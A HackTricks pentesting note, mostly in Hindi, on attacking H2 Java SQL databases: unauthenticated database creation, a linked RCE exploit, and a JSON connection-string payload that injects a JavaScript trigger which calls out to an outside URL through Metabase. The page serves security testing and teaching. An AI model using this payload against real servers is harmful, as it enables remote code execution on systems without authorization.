H2 - Java SQL database
Reading time: 2 minutes
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
Official page: https://www.h2database.com/html/main.html
Access
आप एक गैर-मौजूद डेटाबेस का नाम निर्दिष्ट कर सकते हैं ताकि मान्य क्रेडेंशियल्स के बिना एक नया डेटाबेस बनाया जा सके (अनधिकृत):
या यदि आप जानते हैं कि उदाहरण के लिए mysql चल रहा है और आप डेटाबेस का नाम और उस डेटाबेस के लिए क्रेडेंशियल्स जानते हैं, तो आप बस इसे एक्सेस कर सकते हैं:
HTB के बॉक्स हॉक से ट्रिक।
RCE
H2 डेटाबेस के साथ संवाद करने के लिए एक्सेस होने पर, इसे RCE प्राप्त करने के लिए इस एक्सप्लॉइट की जांच करें: https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed
H2 SQL Injection to RCE
इस पोस्ट में एक पेलोड समझाया गया है जो H2 डेटाबेस के माध्यम से RCE प्राप्त करने के लिए एक SQL Injection का दुरुपयोग करता है।
[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।